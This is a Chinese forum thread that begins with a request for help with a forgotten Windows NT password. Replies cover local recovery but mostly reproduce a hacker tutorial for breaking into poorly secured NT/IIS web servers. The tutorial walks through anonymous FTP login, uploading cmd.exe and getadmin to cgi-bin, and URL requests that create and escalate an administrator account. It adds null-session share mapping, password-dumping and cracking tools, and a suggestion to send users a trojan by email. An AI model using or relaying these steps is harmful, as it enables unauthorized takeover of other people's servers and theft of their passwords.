手绘壁画图案:请问高手,WINDOS NT设置了开机密码,但我忘记了,现在进不去系统了,555.请问如何可以解密啊.急~

你下载一个DOSPASS.exe到软盘中，然后用软盘启动DOS系统，运行DOSPASS，可以清除WINDOWS开会密码。

NT的Administrator的密码忘记了，怎么办?

解决方法：
1:如果你有紧急修复盘，那用他就可以恢复，如果你做了此盘后没有修改过口令，那么口令任然在修复盘的sam文件中。有一点要提醒你，这个文件要用expand来解。
2:用一个L0pht的工具把，http://www.L0pht.com 到这个地方自己看看吧，要不看下面 这些老掉牙的东东吧。精华区应该有吧。

下面的文章来自http://bbs.imu.edu.cn/cgi-bin/slxtit?Hacker/D157 你也可以自己去看。多找找。

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

先把c:\winnt\system32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr

然后重新启动

logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器
这时他就有权限把自己加到Administrator组

不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站,

一些 http的技术也可以供较高级的人员参考

进入NT网络可以采取下面的步骤:

因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆 一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com

Connected to www.xxx.com

220 ntsvr2 Microsoft FTP Service (Version 3.0).

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组，这个帐号我们以后要用来获取Administrator的权限

User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。
那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功，这时你就有了80%的把握。

现在,开始查找cgi-bin目录(或者scripts目录),进去以后, 把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin 然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web 站的人都是管理员下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china
%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china
或者

http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录

之三:

用NT的Netbios技术扫描

nbtstat -a http://www.xxx.com/

或者

nbtstat -A http://www.xxx.com/

这样可以得到其域的共享资源名称

net view file://www.xxx.com/

可以获得其机器的共享资源名称,如果有c盘

net use f: file://www.xxx.com/c

可以用f:映射其c盘

net use \\111.111.111.111\ipc$ "" /user:""

之四: Unix下移植过来的工具:

Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:

WinDump95.exe 使用前还要下载这个库 Packet95.exe

WindowsNT用户的版本

WinDump.exe PacketNT.exe

1.NTFSDOS.EXE -
DOS/Windows上的网络文件系统重定向工具，它具有识别和安装NTFS驱动器，并且进行透明存取的能力。这个简单易用的工具通过从DOS软盘引导，它可以绕过所有NT上的安全审计 机制，对基于Intel的系统上本地NTFS格式化的硬盘进行存取操作，甚至包括压缩硬盘，而不需要任何身份验证。它需要在物理上能够访问目标机器。http://www.ntinternals.com/n
tf
s13.htm.
2.NTRECOVER -
在两个NT工作站之间提供一条串行链接。用基本的NT命令和工具来抢救“坏死”的 NT驱动器上的数据。你甚至可以对“坏死”系统上的驱动器运行CHKDSK操作。
http://www.ntint
ernals.com.
3.NTLOCKSMITH -
绕过Administrator口令，直接进入NT系统。NTLocksmith实际上是NTRecover的附件程序，对于某些忘记或者丢失Administrator口令的系统，它可以修改口令。进入系统只需要几分钟请合法使用软件。http://www.ntinternals.com.
4.NTCrack - 离线式Windows
NT口令crack程序。前提是：这些口令必须是用Jeremy
Allison的PWDump请合法使用软件抓取到的。http://www.somar.com/ntcrack.htm.

5.PWDump Utility Tool/Hack - 这是一个很有用的工具。它可以把用户从Windows
NT上迁移到UNIX系统上，也可以使一个远程用户来破译NT加密信息，包括用户口令的全部Registry，并把它们显示成平文。你必须登录到NT系统，并绕 过管理员权限设置收集到这些口令。可能的话，发一封Email给该系统上的用户，在Email中内嵌Trojan
Horse特洛伊木马。ftp://samba.anu.edu.au/pub/samba/pwdump.
6.The Password Cracker - 扫描Windows
NT口令的工具，对Administrator很有用，它请合法使用软件助于验证NT域用户口令的强度。http://www.omna.com/yes/andybaron/nt-passwd.htm.

以上方法的组合应该够用了。当然现在还有其他的一些工具可以使用。

主板跳线~~

1.重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。

2.运行过程结束时，系统列出了系统超级用户“administrator”。（你是直接使用的“administrator”作为登录名，）的选择菜单，鼠标单击“administrator”，进入命令行模式，键入命令：“net user administrator 123456 /add”强制将“administrator”用户的口令更改为“123456”。

3.重新启动计算机，选择正常模式下运行，就可以用更改后的密码“123456”登录了。